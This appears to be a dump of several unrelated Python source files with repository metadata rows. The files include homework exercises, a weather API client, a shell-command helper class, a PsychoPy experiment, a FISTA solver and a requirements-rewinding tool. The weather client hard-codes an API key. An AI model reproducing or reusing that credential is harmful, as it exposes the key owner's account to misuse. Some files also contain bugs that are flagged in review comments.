#########################################
# Question 1 - do not delete this comment
#########################################
a = 8 # Replace the assignment with a positive integer to test your code.
A = [12,4,0,8] # Replace the assignment with other lists to test your code.
def first_divisible_index(values, divisor):
    """Return the index of the first element divisible by divisor, or -1.

    enumerate() is used instead of the original values.index(element) lookup,
    which reported the wrong (earlier) position whenever the list contained
    duplicate values.
    """
    for idx, value in enumerate(values):
        if value % divisor == 0:
            return idx
    return -1
print(first_divisible_index(A, a))
# End of code for question 1
#########################################
# Question 2 - do not delete this comment
#########################################
B = ['hello', 'world', 'course', 'python', 'day','']
# Replace the assignment with other lists of strings (str) to test your code.
# Write the code for question 2 using a for loop below here.
# Count how many strings are strictly longer than the average string length.
# NOTE(review): an empty B would raise ZeroDivisionError at ave_len below.
sum_len = 0
longer_num = 0
for i in B:
    sum_len += len(i)
ave_len = sum_len/len(B)
for i in B:
    if len(i) > ave_len:
        longer_num += 1
print("The number of strings longer than the average is:", longer_num)
# Write the code for question 2 using a while loop below here.
# Same computation as above, redone with index-based while loops.
sum_len = 0
longer_num = 0
my_str = ""
i=0
j=0
while i<(len(B)):
    my_str = B[i]
    sum_len += len(my_str)
    i +=1
ave_len = sum_len/len(B)
while j<(len(B)):
    my_str = B[j]
    if len(my_str)>ave_len:
        longer_num +=1
    j+=1
print("The number of strings longer than the average is:", longer_num)
# Write the rest of the code for question 2 below here.
# End of code for question 2
#########################################
# Question 3 - do not delete this comment
#########################################
C = [0] # Replace the assignment with other lists to test your code.
# Write the rest of the code for question 3 below here.
# Sum of products of each adjacent pair; a one-element list is its own sum.
if len(C) == 1:
    pro_sum = C[0]
else:
    pro_sum = sum(left * right for left, right in zip(C, C[1:]))
print (pro_sum)
# End of code for question 3
#########################################
# Question 4 - do not delete this comment
#########################################
D = [1, 3,80,-80] # Replace the assignment with other lists to test your code.
# Write the rest of the code for question 4 below here.
# Keep the first two values, then append each later value only when its gap
# to the last kept value exceeds every gap accepted so far.
new_lst = list(D[:2])
my_diff = abs(D[1] - D[0])
for candidate in D[2:]:
    gap = abs(candidate - new_lst[-1])
    if gap > my_diff:
        my_diff = gap
        new_lst.append(candidate)
print(new_lst)
# End of code for question 4
#########################################
# Question 5 - do not delete this comment
#########################################
my_string = 'hfhbhffhfh' # Replace the assignment with other strings to test your code.
k = 2 # Replace the assignment with a positive integer to test your code.
# Write the rest of the code for question 5 below here.
# Find the first character whose k-fold repetition appears in the string.
match = next((ch * k for ch in my_string if ch * k in my_string), None)
if match is not None:
    print ("For length %s, found the substring %s!"%(k,match))
else:
    print ("Didn't find a substring of length",k)
# End of code for question 5
| true |
d1c955ed6dfd6926c64ef662062986d7603578b4 | Python | stevenhorsman/advent-of-code-2019 | /day-05/sunny_with_asteroids.py | UTF-8 | 617 | 3.515625 | 4 | [] | no_license | import sys
from ship_computer import ShipComputer
input_file = 'day-05/input.txt'
def part1(memory, input = 1):
    """Run the comma-separated program text on a ShipComputer fed with
    ``input`` (system ID 1 by default) and return the computer's output.

    NOTE(review): the parameter ``input`` shadows the builtin of the same
    name, and the trailing .copy() on the freshly built split() list is
    redundant -- split() already returns a new list.
    """
    memory = memory.split(",").copy()
    ship_computer = ShipComputer(memory, input)
    ship_computer.execute()
    return ship_computer.get_output()
def part2(input):
    """Run the same program with system ID 5 (Advent of Code day 5, part 2).

    The previous body was dead code left over from the day-2 noun/verb brute
    force: it sat behind a bare ``pass`` and called part1 with three
    arguments even though part1 accepts only two, so it raised TypeError on
    every call.
    """
    # NOTE(review): assumes ShipComputer takes the system ID as its second
    # constructor argument, exactly as part1 does -- confirm against the class.
    return part1(input, 5)
if __name__ == "__main__":
    # Read the puzzle input once and feed the same program text to both parts.
    with open(input_file) as f:
        data = f.read()
    print("Part 1: ", part1(data))
    print("Part 2: ", part2(data))
| true |
e959db41a5647bdf3ec5d130be5896f61581f396 | Python | vaioco/sys2syz | /core/utils.py | UTF-8 | 3,418 | 2.703125 | 3 | [
"MIT",
"Apache-2.0"
] | permissive | # Module : Utils.py
# Description : Contains basic utility functions required for all modules
import os
import subprocess
import logging
import shutil
class Utils(object):
    """Filesystem and shell-command helpers.

    An instance is bound to a working directory (``cwd``); the ``run_*``
    methods execute shell commands there.  The path helpers are intended as
    @staticmethod utilities.
    """
    # Sentinel for get_env(): return the unmodified process environment.
    ENV_NONE = 0
    def __init__(self, cwd):
        # Directory used as cwd for every subprocess spawned by run_* methods.
        self.cwd = cwd
    @staticmethod
    def file_exists(path, exit=False):
        # NOTE(review): the ``exit`` parameter shadows the ``exit`` builtin,
        # so ``exit(0)`` below calls the boolean argument and raises TypeError
        # instead of terminating -- rename the parameter or use sys.exit().
        if os.path.isfile(path):
            return True
        else:
            logging.warn("[+] No file found at %s" % path)
            if exit:
                exit(0)
            return False
    @staticmethod
    def dir_exists(path, exit=False):
        # Same ``exit`` shadowing issue as file_exists() above.
        if os.path.isdir(path):
            return True
        else:
            logging.warn("[+] No file found at %s" % path)
            if exit:
                exit(0)
            return False
    @staticmethod
    def compile_file(file, args, exit=False):
        # TODO: complete this
        # NOTE(review): subprocess.check_call() is invoked with no arguments,
        # which raises TypeError -- this stub has never worked.
        subprocess.check_call()
    @staticmethod
    def create_dir(path):
        # Return True only when the directory was newly created here.
        if os.path.exists(path):
            logging.debug("Directory already exists not creating")
            return False
        else:
            try:
                os.mkdir(path)
            except Exception as e:
                logging.exception(e)
                logging.critical("Unable to create directory")
                return False
            return True
    @staticmethod
    def delete_dir(path):
        # Recursively remove the tree; implicitly returns None on failure.
        if os.path.isdir(path):
            shutil.rmtree(path)
            return True
        else:
            logging.debug("Unable to delete directory")
    def delete_file(path):
        # NOTE(review): missing @staticmethod (or a ``self`` parameter) --
        # calling this on an instance passes the instance as ``path``.
        if os.path.isfile(path):
            os.remove(path)
        else:
            logging.warn("[+] No file found at %s" % path)
    def get_env(self, version):
        # Copy of the process environment; implicitly returns None for any
        # version other than ENV_NONE.
        my_env = os.environ.copy()
        if version == self.ENV_NONE:
            return my_env
    def run_cmd(self, command, env=ENV_NONE, doexit=False):
        # Run ``command`` through the shell in self.cwd; exit(-1) on failure
        # when doexit is set, otherwise just log the error.
        try:
            subprocess.check_call(command, env=self.get_env(env), shell=True, cwd=self.cwd)
        except Exception as e:
            logging.exception(e)
            logging.critical("Unable to run command : {}".format(command))
            if doexit:
                exit(-1)
    def run_silent_cmd(self, command, env=ENV_NONE, doexit=False):
        # Same as run_cmd() but discards the command's stdout and stderr.
        try:
            subprocess.check_call(command, env=self.get_env(env), shell=True, cwd=self.cwd, stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
        except Exception as e:
            logging.exception(e)
            logging.critical("Unable to run command : {}".format(command))
            if doexit:
                exit(-1)
    def run_and_get_output(self, command, env=ENV_NONE, doexit=False):
        # Run ``command`` and return its combined stdout+stderr (bytes, per
        # subprocess.check_output); returns None when it fails and doexit is
        # False.
        try:
            out = subprocess.check_output(command, env=self.get_env(env), cwd=self.cwd, shell=True, stderr=subprocess.STDOUT)
            return out
        except Exception as e:
            logging.exception(e)
            logging.critical("Unable to run command : {}".format(command))
            if doexit:
                exit(-1)
    def file_exists(path, exit=False):
        # NOTE(review): duplicate of the @staticmethod file_exists above; this
        # later definition rebinds the class attribute and, lacking the
        # decorator, misbehaves when called on an instance.
        if os.path.isfile(path):
            return True
        else:
            logging.warn("[+] No file found at %s" % path)
            if exit:
                exit(0)
            return False
    def dir_exists(path, exit=False):
        # NOTE(review): duplicate of the @staticmethod dir_exists above --
        # same rebinding/shadowing issues.
        if os.path.isdir(path):
            return True
        else:
            logging.warn("[+] No file found at %s" % path)
            if exit:
                exit(0)
return False | true |
837f52eeeaf098923d406bc43cb783dc47236099 | Python | VladislavBannikov/py-adv_1.4.Decorators | /main.py | UTF-8 | 135 | 2.546875 | 3 | [] | no_license | from time_logger import logger_decorator_factory
# add() is wrapped by the project decorator; presumably each call is logged
# to log.txt -- confirm against time_logger.logger_decorator_factory.
@logger_decorator_factory('log.txt')
def add(a,b):
    """Return the sum of a and b."""
    return a+b
print(add(4,5))
| true |
90568aa6d149e2e691f6ee7070bdc0d4ef6c47e9 | Python | regbrown99/PackingListGenerator | /PackingListGenerator/getWeather.py | UTF-8 | 5,827 | 3.4375 | 3 | [] | no_license | #! /usr/bin/python3
# getWeather.py - Prints the weather for a location from the command line.
def getWeather(zip_code, city, country):
    """Fetch current weather for a US zip code from OpenWeatherMap, print the
    raw JSON payload in two forms, and return the parsed dict.

    NOTE(review): despite the signature, only ``zip_code`` is used to build
    the request URL; ``city`` and ``country`` are currently ignored (see
    getCurrentWeather/getForecastWeather for the by-city variants).
    NOTE(review): the API key is hard-coded below -- consider reading it from
    an environment variable instead.
    """
    import json, requests
    # Download the JSON data from OpenWeatherMap.org's API
    # (current-weather endpoint; the key goes in the APPID query parameter).
    my_api_key = '5482b2a3705d25d98c10f9364b53caee'
    url = 'http://api.openweathermap.org/data/2.5/weather?zip=%s&APPID=%s' % (zip_code, my_api_key)
    # Other query styles the same endpoint supports:
    #   api.openweathermap.org/data/2.5/weather?q={city name}
    #   api.openweathermap.org/data/2.5/weather?q={city name},{country code}
    #   api.openweathermap.org/data/2.5/weather?zip={zip code},{country code}
    # If no country is specified, the search defaults to the USA.
    response = requests.get(url)
    response.raise_for_status()
    # Load JSON data into a Python variable.
    weatherData = json.loads(response.text)
    # Print the same payload twice: pretty-printed, then as a Python dict.
    print('Using json.dumps... ')
    print(json.dumps(response.json(), indent=2))
    print()
    print('Using response.json... ')
    print(response.json())
    # TODO: return weather data as a dictionary that can be passed to temperatureMapping
    return weatherData
def getCurrentWeather(zip_code, city, country):
    """Fetch OpenWeatherMap current-conditions JSON three ways.

    Returns a 3-tuple of parsed payloads: (by zip code, by city name,
    by city + country code), in that order.
    """
    import json, requests
    api_key = '5482b2a3705d25d98c10f9364b53caee'
    endpoint = 'http://api.openweathermap.org/data/2.5/weather'
    queries = (
        'zip=%s' % zip_code,           # US zip-code lookup
        'q=%s' % city,                 # city-name lookup
        'q=%s,%s' % (city, country),   # city + ISO country-code lookup
    )
    results = []
    for query in queries:
        response = requests.get('%s?%s&APPID=%s' % (endpoint, query, api_key))
        response.raise_for_status()
        results.append(json.loads(response.text))
    return tuple(results)
def getForecastWeather(zip_code, city, country):
    """Fetch OpenWeatherMap forecast JSON three ways.

    Returns a 3-tuple of parsed payloads: (by zip code, by city name,
    by city + country code), in that order.
    """
    import json, requests
    api_key = '5482b2a3705d25d98c10f9364b53caee'
    endpoint = 'http://api.openweathermap.org/data/2.5/forecast'
    queries = (
        'zip=%s' % zip_code,           # US zip-code lookup
        'q=%s' % city,                 # city-name lookup
        'q=%s,%s' % (city, country),   # city + ISO country-code lookup
    )
    results = []
    for query in queries:
        response = requests.get('%s?%s&APPID=%s' % (endpoint, query, api_key))
        response.raise_for_status()
        results.append(json.loads(response.text))
    return tuple(results)
def temperatureMapping(temperature):
    """Map a numeric temperature to a verbal description.

    Input: temperature -- a number (the 45-95 breakpoints suggest degrees
    Fahrenheit; confirm with callers).
    Output: one of 'Really Hot', 'Hot', 'Warm', 'Cool', 'Chilly', 'Cold',
    'Really Cold'.
    """
    # Bug fix: the original compared the not-yet-assigned tempDescription in
    # the 55/45 branches, raising UnboundLocalError for temperatures below 65.
    if temperature >= 95:
        tempDescription = 'Really Hot'
    elif temperature >= 85:
        tempDescription = 'Hot'
    elif temperature >= 75:
        tempDescription = 'Warm'
    elif temperature >= 65:
        tempDescription = 'Cool'
    elif temperature >= 55:
        tempDescription = 'Chilly'
    elif temperature >= 45:
        tempDescription = 'Cold'
    else:
        tempDescription = 'Really Cold'
    return tempDescription
if __name__ == '__main__':
    # Demo run for Katy, TX; getWeather() only actually uses the zip code.
    zip_code = 77494
    city = 'Katy'
    country = 'us'
    print('Returning weatherData variable...')
    print(getWeather(zip_code, city, country))
| true |
4f574b66e9310fe514cd554f1c3c7db444808249 | Python | py1-10-2017/rgero215_PY1-10-2017 | /Store/store.py | UTF-8 | 3,127 | 3.328125 | 3 | [
"MIT-0"
] | permissive | class Store(object):
"""docstring for Store."""
def __init__(self, location, owner):
super(Store, self).__init__()
self.Product = []
self.location = location
self.owner = owner
def inventory(self):
count = 0
for product in self.Product:
count += 1
print '''{}- {}: '''.format(count, product.item_name)
print product.displayInfo()
print '**************************************************'
return self
def add(self, Product):
self.Product.append(Product)
print '''{} has been succefully added to the inventory
=========================================='''.format(Product.item_name)
return self
def remove(self, item_name):
try:
for product in self.Product:
if product.item_name == item_name:
self.Product.remove(product)
print "{} has been remove from the inventory".format(product.item_name)
except ValueError:
print "{} is not in the inventory".format(Product)
return self
class Product(object):
    """A sellable item with price, name, weight, brand and sale status
    (Python 2 code).

    ``status`` starts as 'for sale'; ``tax`` is filled in by addTax().
    Most mutating methods return self for chaining; addTax() returns the
    computed total instead.
    """
    def __init__(self, price, item_name, weight, brand):
        super(Product, self).__init__()
        self.price = price
        self.item_name = item_name
        self.weight = weight
        self.brand = brand
        self.status = 'for sale'
        self.tax = None
    def displayInfo(self):
        # Print a formatted summary card for the product.
        print '''Price: ${} + taxes
        Item Name: {}
        Weight: {}lb
        Brand: {}
        Status: {}
        ======================================='''.format(self.price, self.item_name, self.weight, self.brand, self.status)
        return self
    def sell(self):
        # Mark the product as sold.
        self.status = 'sold'
        return self
    def addTax(self,tax):
        # ``tax`` is a percentage (e.g. 8 for 8%); the rate is stored on the
        # instance and the taxed total is returned (not self).
        tax = float(tax) / 100
        total = self.price + self.price * tax
        print '''Total price for the {} is ${}
        ========================================'''.format(self.item_name, total)
        self.tax = tax
        return total
    def return_item(self,reason):
        # Adjust status/price by the condition of the returned item:
        # 'defective' -> worthless; 'like new'/'in the box' -> resell as-is;
        # 'opened' -> resell used at a 20% discount.
        if reason == 'defective':
            self.status = reason
            self.price = 0
            print ''' This itme has been returned as {}'''.format(reason)
        elif reason == 'like new' or reason == 'in the box':
            self.status = 'for sale'
            print ''' This itme has been return {}'''.format(reason)
        elif reason == 'opened':
            total = self.price - float(self.price) * 0.20
            self.status = 'used'
            self.price = total
            print ''' This itme has been return and the box has been {}'''.format(reason)
        return self
# Demo: stock a store with five products, print the inventory, then remove
# the iPad and print the inventory again (remove() returns the store, so the
# final two calls chain).
product1 = Product(200, 'iPad', 2, 'Apple')
product2 = Product(100, 'Head Phone', 1, 'Beats')
product3 = Product(600, 'iPhone', 1, 'Apple')
product4 = Product(250, 'HD Monitor', 25, 'Samsugn')
product5 = Product(100, 'iPhone Case', 1, 'Mophie')
store1 = Store( 'Santiago', 'Ramon Geronimo')
store1.add(product1)
store1.add(product2)
store1.add(product3)
store1.add(product4)
store1.add(product5)
store1.inventory()
store1.remove('iPad').inventory()
| true |
f093853b72e1566842b6a1935b4b91aa09560e59 | Python | JARS29/RST_psychopy | /RST.py | UTF-8 | 2,823 | 3.03125 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
from trials import *
# Select which experimental session to run: 1 (with practice) or 2.
experiment_session = 2
text_instructions = "Bem-vindo ao experimento\nA seguir, você vai encontar uma série de frases apresentadas em sequências de 2, 3, 4, 5, 6 sentenças (em ordem aleatória).\n" \
                    "Sua tarefa vai ser ler as frases de forma natural, em voz alta e tentar lembrar a última palavra de cada sentença.\nUm simbolo '+' vai parecer no momento quando você deve " \
                    "dizer as palavras a serem lembradas (em qualquer ordem).\n \n" \
                    "Vamos praticar, presione qualquer tecla para começar um sesão de prática."
text_instructions_s1 = "Preparado?\nVamos começar com o experimento. Presione qualquer tecla para começar a primeira sessão."
text_final_s1 = "Pronto!!!\nA primeira sessão terminou. Aguarde ao experimentador para responder as perguntas."
text_instructions_s2 = "Preparado?\nVamos começar com o experimento. Presione qualquer tecla para começar a segunda sessão."
text_final_s2 = "Pronto!!!\nO experimento terminou. Aguarde ao experimentador para responder as perguntas dessa sessão.\n \n" \
                "Muito obrigado pela participação."
# Store info about the experiment session
expName = 'Reading Span Test' # from the Builder filename that created this script
# setting_exp/setting_monitor/*_trial come from the star import of ``trials``;
# ``core`` is presumably re-exported by the same module -- confirm there.
# NOTE(review): the 'common\sentences_*.xlsx' paths use Windows backslashes;
# '\s' happens to survive as a literal (not a recognised escape) but raw
# strings or os.path.join would be safer.
if experiment_session == 1:
    expInfo = {u'Session': u'01', u'Participant': u''}
    thisExp = setting_exp(expName, expInfo)
    # Setup monitor
    win = setting_monitor('default', 80, expInfo)
    # Instructions trial
    instructions_trial(win, text_instructions)
    # Practice trial
    sentences_practice='common\sentences_practice.xlsx'
    practice_trial(win,sentences_practice,thisExp,expInfo)
    # Final instructions before experiment
    instructions_trial(win, text_instructions_s1)
    # Experiment session 1
    # Sentences_session _1
    sentences_s1 = 'common\sentences_s1.xlsx'
    experiment_trial(win, sentences_s1, thisExp, expInfo)
    #Final message session 1
    instructions_trial(win, text_final_s1)
    thisExp.abort() # or data files will save again on exit
    win.close()
    core.quit()
elif experiment_session == 2:
    expInfo = {u'Session': u'02', u'Participant': u''}
    thisExp = setting_exp(expName, expInfo)
    # Setup monitor
    win = setting_monitor('default', 80, expInfo)
    # Instructions for the second session
    instructions_trial(win, text_instructions_s2)
    # Experiment session 2
    # Sentences_session 2
    sentences_s2 = 'common\sentences_s2.xlsx'
    experiment_trial(win, sentences_s2, thisExp, expInfo)
    # Final message session 2 and experiment
    instructions_trial(win, text_final_s2)
    thisExp.abort() # or data files will save again on exit
    win.close()
core.quit() | true |
54c98511504bebcd81766a448d2afbe7a2a9080a | Python | stehrenberg/HomeAutomation | /python_examples/python/demo_function.py | UTF-8 | 2,632 | 4.59375 | 5 | [] | no_license | # python function
# see also http://www.tutorialspoint.com/python/python_functions.htm
from __future__ import print_function, division
def SayHello(p_name):
    """This is the documentation string of the function.
    The function prints 'Hello p_name!'
    There is no return value."""
    # str() matches print()'s own conversion, so the output is unchanged.
    print("Hello " + str(p_name) + "!")
    return
# Show SayHello's docstring via help(), then call it once.
help(SayHello)
SayHello("Hubert")
print("------------------------------------------------------")
# numbers, strings and tuples are immutable arguments and passed to the function by copy
def ChangeNumber(n):
    """The argument n will be left unchanged outside the function"""
    # Rebinding n inside the function cannot affect the caller's variable.
    return n + 1
# my_n is unchanged afterwards: ints are immutable, so only the return value
# carries the increment.
my_n = 100
new_n = ChangeNumber(my_n)
print("value of my_n after calling ChangeNumber():", my_n)
print("return value of ChangeNumber():", new_n)
# function arguments that are mutable are passed by reference (lists, dictionaries, objects) !!
# note: the following function definition is considered bad style
def ChangeList(l):
    """The argument l (as a list) will be changed also outside the function.
    This is called a side-effect of the function call."""
    # In-place extension mutates the caller's list object directly.
    l += [33]
# The list is mutated in place, so the appended 33 is visible here.
my_list = [1,2,3]
ChangeList(my_list)
print("value of my_list after calling ChangeList():", my_list)
print("------------------------------------------------------")
# function arguments with default values
def SumUpNumbers(n, start=1, step=1):
    """Sum n terms of the arithmetic sequence start, start+step, ...

    Demonstration of optional arguments with default values.
    """
    # A while loop is kept deliberately: its "stop once current >= limit"
    # semantics (e.g. an immediate 0 for a negative step) must be preserved.
    total = 0
    current = start
    limit = start + n * step
    while current < limit:
        total += current
        current += step
    return total
# Exercise SumUpNumbers with positional, keyword and mixed argument styles.
s = SumUpNumbers(100)
print("sum of 100 integers starting from 1 is", s)
s = SumUpNumbers(100, 100)
print("sum of 100 integers starting from 100 is", s)
s = SumUpNumbers(100, step=2)
print("sum of 100 integers starting from 1 and with step 2 is", s)
s = SumUpNumbers(100, 200, 2)
print("sum of 100 integers starting from 200 and with step 2 is", s)
s = SumUpNumbers(100, step=2, start=200)
print("sum of 100 integers starting from 200 and with step 2 is", s)
print("------------------------------------------------------")
# variable length arguments
# the list of variable length must follow the mandatory arguments
def PrintNumbers(arg1, *argv): # argv collects the extra positional args as a tuple
    """Demonstration of variable-length arguments: print the mandatory
    argument, then each extra argument, then how many extras were given."""
    for item in (arg1,) + argv:
        print(item)
    print("number of variable arguments was:", len(argv))
# One mandatory argument alone, then with three extra positional arguments.
PrintNumbers(10)
PrintNumbers(10,20,30,40)
| true |
2d9050a02ec16a8ef1066e5ac46424a881196c6c | Python | vais-ral/CCPi-Framework | /Wrappers/Python/cil/optimisation/algorithms/FISTA.py | UTF-8 | 4,048 | 2.90625 | 3 | [
"GPL-3.0-only",
"Apache-2.0"
] | permissive | # -*- coding: utf-8 -*-
# This work is part of the Core Imaging Library (CIL) developed by CCPi
# (Collaborative Computational Project in Tomographic Imaging), with
# substantial contributions by UKRI-STFC and University of Manchester.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cil.optimisation.algorithms import Algorithm
from cil.optimisation.functions import ZeroFunction
import numpy
import warnings
class FISTA(Algorithm):
    r'''Fast Iterative Shrinkage-Thresholding Algorithm (FISTA)

    Solves the problem

    .. math::

      \min_{x} f(x) + g(x)

    where ``f`` is differentiable (with Lipschitz constant ``f.L``) and
    ``g`` is convex with a "simple" proximal operator.

    :param initial: Initial guess ( Default initial = 0)
    :param f: Differentiable function
    :param g: Convex function with " simple " proximal operator

    Reference:
      Beck, A. and Teboulle, M., 2009. A fast iterative shrinkage-thresholding
      algorithm for linear inverse problems.
      SIAM journal on imaging sciences, 2(1), pp.183-202.
    '''
    def __init__(self, initial=None, f=None, g=ZeroFunction(), **kwargs):
        '''FISTA algorithm creator

        Initialisation can be done at creation time if all proper variables
        are passed, or later with set_up.

        :param initial: Initial guess ( Default initial = 0)
        :param f: Differentiable function
        :param g: Convex function with " simple " proximal operator

        NOTE(review): ``g=ZeroFunction()`` is a mutable default evaluated
        once at definition time; every instance created without an explicit
        ``g`` shares the same ZeroFunction object.
        '''
        super(FISTA, self).__init__(**kwargs)
        # Backwards compatibility: accept the deprecated x_init keyword as an
        # alias for initial, but refuse ambiguous calls that supply both.
        if kwargs.get('x_init', None) is not None:
            if initial is None:
                warnings.warn('The use of the x_init parameter is deprecated and will be removed in following version. Use initial instead',
                   DeprecationWarning, stacklevel=4)
                initial = kwargs.get('x_init', None)
            else:
                raise ValueError('{} received both initial and the deprecated x_init parameter. It is not clear which one we should use.'\
                    .format(self.__class__.__name__))
        if initial is not None and f is not None:
            self.set_up(initial=initial, f=f, g=g)
    def set_up(self, initial, f, g=ZeroFunction()):
        '''Initialisation of the algorithm

        :param initial: Initial guess ( Default initial = 0)
        :param f: Differentiable function (must expose its Lipschitz constant L)
        :param g: Convex function with " simple " proximal operator
        '''
        print("{} setting up".format(self.__class__.__name__, ))
        # y is the extrapolated point, x/x_old the current/previous iterates,
        # u a scratch buffer for the gradient step.
        self.y = initial.copy()
        self.x_old = initial.copy()
        self.x = initial.copy()
        self.u = initial.copy()
        self.f = f
        self.g = g
        if f.L is None:
            raise ValueError('Error: Fidelity Function\'s Lipschitz constant is set to None')
        self.invL = 1/f.L
        self.t = 1
        self.configured = True
        print("{} configured".format(self.__class__.__name__, ))
    def update(self):
        # One FISTA iteration (Beck & Teboulle 2009), computed in place:
        self.t_old = self.t
        # Gradient step: u = y - (1/L) * grad f(y).
        self.f.gradient(self.y, out=self.u)
        self.u.__imul__( -self.invL )
        self.u.__iadd__( self.y )
        # Proximal step: x = prox_{g/L}(u).
        self.g.proximal(self.u, self.invL, out=self.x)
        # Momentum coefficient update.
        self.t = 0.5*(1 + numpy.sqrt(1 + 4*(self.t_old**2)))
        # Extrapolation: y = x + ((t_old - 1)/t) * (x - x_old).
        self.x.subtract(self.x_old, out=self.y)
        self.y.axpby(((self.t_old-1)/self.t), 1, self.x, out=self.y)
        self.x_old.fill(self.x)
    def update_objective(self):
        # Record the current value of the composite objective f(x) + g(x).
        self.loss.append( self.f(self.x) + self.g(self.x) )
| true |
254ada402b28d66fa13cde3e59209e464232714e | Python | Mulan-94/pyrewind | /pyrewind/pyrewind.py | UTF-8 | 5,764 | 2.828125 | 3 | [
"MIT"
] | permissive | #/usr/bin/python3
# Author: L. A. L. Andati
# Find infos at: https://wiki.python.org/moin/PyPIJSON
import logging
import requests
import sys
from argparse import ArgumentParser
from datetime import datetime
def get_release_dates(package):
    """Query PyPI's JSON API for ``package`` and collect its release history.

    Returns a dict with:
      * ``error``: 0 on success, -1 when the HTTP request failed;
      * on success, also ``package_name``, ``author``, ``latest_version`` and
        ``release_dates`` -- an upload-timestamp -> version mapping sorted by
        timestamp (ISO-8601 strings sort lexicographically, which here equals
        chronologically).
    """
    # the pypi url including the dates
    url = f"https://pypi.org/pypi/{package}/json"
    logging.debug(f"Currently getting package: {package}")
    # make get request
    res = requests.get(url)
    # ensure code is 200
    status_code = res.status_code
    # logging.info(f"Request returns status code: {status_code}")
    output = {}
    if res.ok:
        # api returns JSON
        data = res.json()
        # get some info
        p_info = data["info"]
        author = p_info["author"]
        name = p_info["name"]
        curr_version = p_info["version"]
        # keys here are the release versions
        r_info = data["releases"]
        # release info; keyed by the upload time of each version's last file
        release_dates = {}
        for rel_version in r_info:
            mini_releases = r_info[rel_version]
            if len(mini_releases) > 0:
                # latest mini_releas's uptime
                up_time = mini_releases[-1]['upload_time']
                release_dates[up_time] = rel_version
            else:
                continue
        sorted_dates = sorted(list(release_dates.keys()))
        sorted_release_dates = {d: release_dates[d] for d in sorted_dates}
        output["package_name"] = name
        output["author"] = author
        output["latest_version"] = curr_version
        output["release_dates"] = sorted_release_dates
        output["error"] = 0
    else:
        logging.warning(f"Package: {package} returned status code: {status_code}")
        logging.warning("Query has failed")
        output["package_name"] = package
        output["error"] = -1
    # close connection
    res.close()
    logging.debug("Closing connection")
    return output
def parse_required_release(package, before):
    """Return a ``name==version`` pin for the newest release of ``package``
    uploaded strictly before ``before`` (a 'dd-mm-yyyy' date string).

    Returns -1 when no such release exists, or the error code from
    get_release_dates() when the PyPI lookup itself failed.

    NOTE(review): ``before`` parses to midnight of that day, so a release
    uploaded *on* the given date is excluded -- this contradicts the earlier
    "before or on this date" wording; confirm the intended semantics.
    """
    info = get_release_dates(package)
    if info["error"] == 0:
        before = datetime.strptime(before, "%d-%m-%Y")
        release_dates = info["release_dates"]
        p_name = info["package_name"]
        # traverse the list in reverse order (starting from most recent)
        rd_keys = list(release_dates.keys())
        # earliest_release (rd_keys is already sorted chronologically)
        er = datetime.strptime(rd_keys[0], "%Y-%m-%dT%H:%M:%S")
        release = None
        # starting from the most recent release
        for da in reversed(rd_keys):
            curr = datetime.strptime(da, "%Y-%m-%dT%H:%M:%S")
            if curr < before:
                release = release_dates[da]
                break
        if release is None:
            logging.warning(f"{package} was not released before {before.day}-{before.month}-{before.year}")
            logging.warning(f"Earliest release is version: {release_dates[rd_keys[0]]}, released on: {er.day}-{er.month}-{er.year}")
            logging.info(f"Latest release: {info['latest_version']}")
            result = -1
        else:
            result = f"{p_name}=={release}"
    else:
        result = info["error"]
    return result
def read_reqs_file(rfile):
    """Read a requirements file and return the bare package names,
    i.e. each line with its newline and any '==version' pin stripped."""
    with open(rfile, 'r') as handle:
        return [line.strip('\n').split("==")[0] for line in handle]
def get_argparse():
    """Build the command-line parser for the pyrewind entry point.

    Despite the group name, argparse does not enforce grouped options as
    required -- every option here silently falls back to its default.
    NOTE(review): the triple-quoted help strings embed source indentation in
    the --help output; textwrap.dedent would render more cleanly.
    """
    parser = ArgumentParser(
        usage="pyrewind [options] <value>",
        description="Take your requirements' versions back in time :)")
    required = parser.add_argument_group("Required arguments")
    required.add_argument("--before",
                        help="""Get versions of requirements in
                        requirements file before this
                        date. Format must be 'dd-mm-yyyy'""",
                        dest="before", type=str, metavar="", default=None)
    # store_true when argument is provided
    required.add_argument("--debug",
                        help="Enable debugging mode",
                        dest="debug", action="store_true")
    required.add_argument("-if", "--input-file",
                        help="File containing the current requirements",
                        dest="ifile", type=str, metavar="", default=None)
    required.add_argument("-of", "--output-file",
                        help="""Name to give generated output file name
                        containing the new (older) requirements. Including
                        the file extension eg. retro.txt""",
                        dest="ofile", type=str, metavar="",
                        default="retro.txt")
    return parser
def main():
    """Entry point: rewind every package in the input requirements file to
    its newest release before --before, writing the pins to --output-file."""
    parser = get_argparse()
    options = parser.parse_args()
    # 10/20 are logging.DEBUG/logging.INFO respectively.
    if options.debug:
        level = 10
    else:
        level = 20
    logging.basicConfig(
        level=level,
        format='%(asctime)s - %(levelname)s - %(filename)s - %(message)s')
    reqs = read_reqs_file(options.ifile)
    n_reqs = len(reqs)
    logging.info(f"Found {n_reqs} requirements.")
    rels = []
    skipped = []
    for i, req in enumerate(reqs, 1):
        logging.info(f"Package: {i} / {n_reqs}")
        rel = parse_required_release(req, options.before)
        # -1 means no release existed before the cut-off (or the PyPI query
        # failed); such packages are skipped rather than pinned.
        if rel == -1:
            skipped.append(req)
            continue
        else:
            rels.append(f"{rel}\n")
    with open(options.ofile, 'w') as wf:
        wf.writelines(rels)
    logging.info(f"Done writing file to: {options.ofile}")
    logging.info(f"Skipped packages: {', '.join(skipped)}")
| true |
class Buffer:
    """Collects numbers and, each time five have accumulated, prints their
    sum (also kept in ``self.sum``) and empties the buffer."""

    def __init__(self):
        self.buf = []

    def add(self, *a):
        """Append each argument; flush (print the sum, reset) at every
        fifth buffered item."""
        for value in a:
            self.buf.append(value)
            if len(self.buf) >= 5:
                # The check runs after every single append, so the buffer can
                # only ever reach exactly five items here.
                self.sum = sum(self.buf)
                print(self.sum)
                self.buf = self.buf[5:]

    def get_current_part(self):
        """Return the numbers buffered since the last flush."""
        return self.buf
| true |
